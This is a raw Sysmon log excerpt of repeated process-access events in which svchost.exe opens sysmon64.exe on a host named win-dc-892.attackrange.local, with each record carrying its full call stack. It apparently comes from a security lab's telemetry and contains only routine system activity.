12:01:02.424{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002043Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.424{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002042Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.424{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002041Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.424{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002040Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.424{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002039Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.424{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002038Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.424{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002037Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.424{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002036Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.403{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002035Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.403{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002034Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.402{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002033Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.402{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002032Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.402{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002031Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.402{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002030Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.402{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002029Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.402{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002028Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.402{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002027Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.396{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002026Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.396{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002025Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.396{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002024Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.396{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002023Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.396{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002022Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.396{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002021Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.396{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002020Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
